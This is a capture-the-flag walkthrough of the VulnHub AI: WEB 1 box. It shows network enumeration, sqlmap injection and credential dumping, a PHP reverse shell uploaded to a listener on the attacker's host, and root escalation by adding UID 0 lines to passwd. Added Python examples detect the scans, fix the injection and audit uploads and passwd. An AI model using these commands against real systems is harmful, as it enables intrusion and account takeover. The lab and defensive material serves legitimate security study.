Pentesting: AI: WEB 1 | Privilege Escalation Attack | Python Reverse Shell | Vulnerabilities | SQL Injection | WriteUp | Walkthrough | VulnHub CTF | Flags
Hello, friends, I’m Shams Ul Mehmood and this is my 4th article. This article is a walkthrough of the AI: WEB: 1 Vulnhub box. It covers vulnerabilities such as SQL injection, a Python reverse shell and user privilege escalation. You can find this Vulnhub box here.
Steps:
- Getting the target machine IP address by Netdiscover utility
- Getting open port details by using the Nmap tool
- Enumerating HTTP default Port with Dirb / Gobuster / Nikto utilities
- Exploitation of Sql Injection Vulnerability
- Taking the Python reverse shell and user privilege escalation
Step-1:
📌️ In the first step of the scanning, I used the netdiscover -r command to perform a local network scan and find the IP address of the victim machine.
Command : sudo netdiscover -r 192.168.204.0/24
Step-2:
📌️ In the second step, after getting the victim machine’s IP address, I ran an Nmap scan against the victim. I used:
- -sS : TCP SYN scan to find open ports and the services behind them.
- -sV : to detect application versions.
- -p- : to scan all ports on the victim machine.
- -sC : to run the default NSE scripts.
Command : sudo nmap -sS -p- -sV -sC 192.168.204.136
📌 This Nmap scan of the target machine at 192.168.204.136 confirmed the IP address and found only a single open port, 80.
📌 Now I opened the target machine’s IP address in the browser.
Step-3:
📌️ In this step, I used multiple tools (dirb, gobuster and nikto) to enumerate interesting hidden files and directories on the target machine.
Command : sudo dirb http://192.168.204.136
Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.204.136
Command : nikto -h http://192.168.204.136/m3diNf0/
Command : nikto -h 192.168.204.136
📌 Then, in the browser address bar, I appended ‘/robots.txt’ to the victim machine’s IP address.
📌 In robots.txt you can see two parts: Disallow and User-agent.
📌 Then I appended the robots.txt entries one by one to the target IP address in the browser address bar.
URL : 192.168.204.136/*
URL : 192.168.204.136/m3diNf0/
URL : 192.168.204.136/se3reTdir777/uploads/
📌 But they returned status code errors like 404 (Not Found) and 403 (Forbidden).
📌 Then I appended ‘/m3diNf0/’ and ‘info.php’ to the target machine’s IP address in the browser address bar.
📌 When I appended “/se3reTdir777" to the victim IP address in the browser address bar, I found a form page.
URL : 192.168.204.136/se3reTdir777/
📌 Then I entered a few user IDs and got back basic user info.
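The enumeration above leaves a distinctive trail in the web server’s access log: a dense run of 403/404 responses from one client, and User-Agent strings that name the tool. The Python script below is an added example (not part of the original write-up) that parses Apache combined-format log lines and flags both patterns. The log lines are constructed samples, and the scanner User-Agent substrings, the miss threshold and the time window are heuristics I chose for the demo, not values from the post.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-format log lines for the demo (not from the original write-up).
SAMPLE_LOG = """\
192.168.204.143 - - [10/Mar/2024:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 57 "-" "Mozilla/5.0"
192.168.204.143 - - [10/Mar/2024:10:00:02 +0000] "GET /admin/ HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Nikto/2.1.6)"
192.168.204.143 - - [10/Mar/2024:10:00:02 +0000] "GET /backup/ HTTP/1.1" 404 275 "-" "gobuster/3.1"
192.168.204.143 - - [10/Mar/2024:10:00:03 +0000] "GET /cgi-bin/ HTTP/1.1" 403 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.168.204.143 - - [10/Mar/2024:10:00:03 +0000] "GET /images/ HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.168.204.143 - - [10/Mar/2024:10:00:04 +0000] "GET /test/ HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.168.204.143 - - [10/Mar/2024:10:00:04 +0000] "GET /m3diNf0/ HTTP/1.1" 403 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.168.204.143 - - [10/Mar/2024:10:00:05 +0000] "GET /se3reTdir777/ HTTP/1.1" 200 1320 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.0.0.5 - - [10/Mar/2024:10:00:06 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2024:10:00:07 +0000] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Heuristic substrings that identify common scanners by their default User-Agent
# (assumed values for the demo; tune them to the tools you actually see in your logs).
SCANNER_UA = re.compile(r"nikto|gobuster|dirb|sqlmap", re.IGNORECASE)


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["status"] = int(e["status"])
        e["time"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entries.append(e)
    return entries


def find_scanner_agents(entries):
    """Return sorted (ip, user_agent) pairs whose User-Agent names a known scanner."""
    hits = {(e["ip"], e["ua"]) for e in entries if SCANNER_UA.search(e["ua"])}
    return sorted(hits)


def find_bruteforce(entries, threshold=5, window_seconds=60):
    """Return {ip: count} for clients with >= threshold 403/404 responses inside one window.

    A wordlist-driven tool such as dirb or gobuster produces a dense run of misses;
    a normal browser session produces a handful at most.
    """
    misses = defaultdict(list)
    for e in entries:
        if e["status"] in (403, 404):
            misses[e["ip"]].append(e["time"])
    flagged = {}
    for ip, times in misses.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):  # sliding window over the sorted timestamps
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    print("scanner user-agents:", find_scanner_agents(entries))
    print("directory brute-force:", find_bruteforce(entries))
```

On the sample above the script flags 192.168.204.143 both for its six misses in a few seconds and for the Nikto and gobuster User-Agents, while the ordinary client 10.0.0.5 with one missing favicon is left alone. Pointing it at a real access log is a cheap way to confirm whether the enumeration from Step-3 would have been visible to the box’s owner.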
Step-4:
📌 In the fourth step, I found an error-based SQL injection vulnerability in this basic web form page by entering a single quote (') in the text field.
📌 Then, before launching the SQL injection exploitation, I captured the HTTP request with Burp Suite, saved the captured request to a file named ‘attack_request.txt’ on the desktop, and started the exploitation with sqlmap.
📌 Then I used the following commands:
Command : ls ./Desktop/
Command : sudo sqlmap -r ./Desktop/attack_request.txt
Command : sudo sqlmap -r ./Desktop/attack_request.txt --dbs
Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T systerUser --columns
Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T user --columns
Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T user -C firstName,id,lastName --dump
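The form breaks on a single quote because the request parameter is pasted straight into the SQL text. As an added example (not code from the box or from this write-up), the Python snippet below reproduces that defect against an in-memory SQLite table shaped like the dumped user table (constructed rows, not the box’s data) and places the parameterised query beside it: the tautology that makes the vulnerable lookup return every row returns nothing from the safe one, and a stray quote no longer surfaces a database error for the page to echo.

```python
import sqlite3


def make_db():
    """Constructed in-memory table with the columns seen in the dump
    (firstName, id, lastName); the rows are sample data, not the box's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, firstName TEXT, lastName TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)",
                     [(1, "Alice", "Sample"), (2, "Bob", "Sample")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """The defect behind an error-based SQLi: the request parameter becomes part of the SQL."""
    sql = "SELECT firstName, lastName FROM user WHERE id = '" + user_id + "'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # An application that prints this into the page hands the tester the query
        # structure, which is exactly what error-based injection relies on.
        return "DB ERROR: " + str(exc)


def lookup_safe(conn, user_id):
    """Fix: reject anything that is not a plain integer id, then bind the value as a
    parameter so the database never parses it as SQL."""
    if not user_id.isdigit():
        return []
    return conn.execute("SELECT firstName, lastName FROM user WHERE id = ?",
                        (int(user_id),)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, "1"))             # normal lookup
    print(lookup_vulnerable(conn, "'"))             # stray quote: database error leaks out
    print(lookup_vulnerable(conn, "1' OR '1'='1"))  # tautology: every row comes back
    print(lookup_safe(conn, "1' OR '1'='1"))        # same input, nothing returned
```

The validation step is deliberate: parameter binding alone already stops the injection, but refusing non-numeric ids before the query runs also keeps malformed input out of the error log and makes the expected input shape explicit to the next maintainer.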
📌 Now we decode the base64-encoded user passwords with the following commands:
Command : sudo echo RmFrZVVzZXJQYXNzdzByZA== | base64 -d
Command : sudo echo TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== | base64 -d
Command : sudo echo TjB0VGhpczBuZUFsczA= | base64 -d
Command : sudo sqlmap -r ./Desktop/attack_request.txt --dbs --os-pwn
📌 This task takes a few message prompts, so I will try to walk you through it. I had to try a few times before I got it right myself.
📌 I went with the default PHP language option, as we know the site is running PHP, and opted in to full path disclosure to start.
📌 This is when things get a little tricky.
📌 With some trial and error, I eventually went back to the info.php file we found earlier and discovered a slightly unconventional root directory:
Path : /home/www/html/web1x443290o2sdf92213/
📌 The sqlmap --os-pwn option uploads a malicious payload, so I appended our discovered uploads directory to this strange root directory, saved the result in a text file called ‘directory_listing’ and used it with option 3 in the next prompt.
📌 Before that, I first needed to put the payload path below into the directory_listing file in the root user’s home directory, using the commands below.
Payload : /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads
Command : pwd
Command : cd /root
Command : nano /root/directory_listing
📌 Paste the above payload into the directory_listing file.
📌 Then enter the directory_listing file location at the prompt.
📌 And just when it looked like we were about to get a reverse TCP connection...
📌 It failed!
📌 One of the best things about sqlmap, aside from automating the injection trial and error for you, is that it also shows you what it is doing.
Step-5:
📌 In the fifth step, when we look back at the sqlmap logs we see this, which reveals a PHP script with an upload form.
URL : http://192.168.204.136/se3reTdir777/uploads/tmpuanbs.php
📌 Right, this makes everything so much easier. We can turn to our favourite php-reverse-shell script and be good to go.
📌 Here you can see php-reverse-shell.php.
📌 I changed the script to point to my local IP address, 192.168.204.143, and port 1010 (for good luck).
📌 I saved the modified copy as php_script.php.
📌 I then started a listener on my local machine with the following command.
Command : nc -lvp 1010
📌 Then I browsed to the php_script.php file in the Downloads directory using the upload form.
📌 After selecting php_script.php with the upload form, the file uploaded successfully.
📌 Ok, now the moment of truth. With our listener still running in the background terminal, we navigate over to php_script.php.
📌 Wow, I have a shell.
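The foothold here is a PHP file written into a web-served uploads directory. As an added example from the defender’s side (not part of the original post), the Python scanner below walks an uploads tree and reports files that a PHP-enabled web server would execute, either by extension or because a PHP open tag sits inside a file with an innocent-looking name. The sample directory it builds is constructed for the demo, and the extension list is an assumption to be matched against the handlers configured on your own server.

```python
import os
import re
import tempfile

# Extensions a typical PHP-enabled web server would execute if they sit under the
# document root (assumed list; extend it to match your server's handler configuration).
EXECUTABLE_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}
# A PHP open tag in the first bytes betrays code smuggled in under a harmless name.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)")


def scan_uploads(root, head_bytes=4096):
    """Walk an uploads tree and return sorted (relative_path, [reasons]) for files that
    a web server would execute or that carry PHP code regardless of their name."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if os.path.splitext(name)[1].lower() in EXECUTABLE_EXT:
                reasons.append("executable extension")
            with open(path, "rb") as fh:
                head = fh.read(head_bytes)   # the open tag is normally near the start
            if PHP_OPEN_TAG.search(head):
                reasons.append("php open tag in content")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)


def build_sample_uploads():
    """Create a constructed uploads directory for the demo and return its path."""
    root = tempfile.mkdtemp(prefix="uploads_demo_")
    samples = {
        "avatar.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,                   # benign image
        "notes.txt": b"just some text\n",                                   # benign text
        "php_script.php": b"<?php echo 'placeholder'; ?>\n",                # obvious: wrong extension
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"<?php echo 'hidden'; ?>",      # disguised: JPEG magic first
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, reasons in scan_uploads(build_sample_uploads()):
        print(rel, "->", ", ".join(reasons))
```

The scanner is a detection aid, not the fix: the lasting mitigation is to store uploads outside the document root, or to configure the web server so nothing under the uploads path is handed to the PHP interpreter, so that a dropped php_script.php is served as inert bytes instead of being executed.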
📌 Then I executed the following command:
Command : whoami
📌 I used a Python one-liner to spawn a TTY shell.
Command : python -c "import pty; pty.spawn('/bin/bash')"
Command : whoami
Command : ls
Command : ls /etc/passwd
📌 Then I want to show you the usernames in the passwd file.
Command : cat /etc/passwd
📌 Here I want to add multiple new usernames to the passwd file using the following commands.
Command : echo "root:x:0:0:root:/root:/bin/bash" >> passwd
Command : echo "aiweb1pwn:x:0:0:root:/root:/bin/bash" >> passwd
Command : echo "cybershark:x:0:0:root:/root:/bin/bash" >> passwd
Command : cat passwd
📌 Then I switched from the www-data user to the aiweb1pwn user with the following command.
Command : su aiweb1pwn
📌 Then I entered the password for the aiweb1pwn user.
Password : MyEvilPass_f908sdaf9_sadfasf0sa
Command : whoami
📌 Awesome, I have root-level access to the victim machine.
📌 Then I used the following commands to find the required flag.
Command : cd /home/root/
Command : ls
Command : cat flag.txt
CTF Game Over : I am Root!
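The escalation in Step-5 works only because the low-privileged shell can write to the passwd file and nobody notices extra UID 0 entries. As an added example (not from this write-up), the Python audit below parses passwd-format content, reports any non-root account with UID 0 and any entry whose password field is not shadowed, and checks whether the file is world-writable. The sample entries and the hash placeholder are constructed for the demo.

```python
import os
import stat
import tempfile

# Constructed passwd-format sample for the demo; the hash value is a placeholder, not a real hash.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
aiweb1pwn:x:0:0:root:/root:/bin/bash
cybershark:$1$PLACEHOLDER$notarealhash:0:0:root:/root:/bin/bash
"""


def parse_passwd(text):
    """Yield (lineno, fields) per non-empty line; fields is the 7-element list
    name, password, uid, gid, gecos, home, shell, or None if the line is malformed."""
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        yield lineno, (fields if len(fields) == 7 else None)


def audit_passwd(text):
    """Return a list of finding strings, in file order."""
    findings = []
    for lineno, fields in parse_passwd(text):
        if fields is None:
            findings.append(f"malformed:line{lineno}")
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(f"uid0:{name}")        # a second root-equivalent account
        if password not in ("x", "*", "!", "!!"):
            findings.append(f"unshadowed:{name}")  # hash or empty password kept in passwd
    return findings


def is_world_writable(path):
    """True if the file mode grants write to 'other' (for example -rw-rw-rw-)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def write_sample_passwd(mode):
    """Write PASSWD_SAMPLE to a temp file with the given mode and return its path."""
    fd, path = tempfile.mkstemp(prefix="passwd_demo_")
    with os.fdopen(fd, "w") as fh:
        fh.write(PASSWD_SAMPLE)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    print(audit_passwd(PASSWD_SAMPLE))
    for mode in (0o644, 0o666):
        print(oct(mode), "world-writable:", is_world_writable(write_sample_passwd(mode)))
```

Run against a live system the audit would read /etc/passwd and call is_world_writable on it; the expected state is mode 0644 owned by root, no UID 0 entry other than root, and every password field set to x. Any of the three findings on a box you operate is worth a ticket, and the two UID 0 lines in the sample are exactly what the write-up leaves behind.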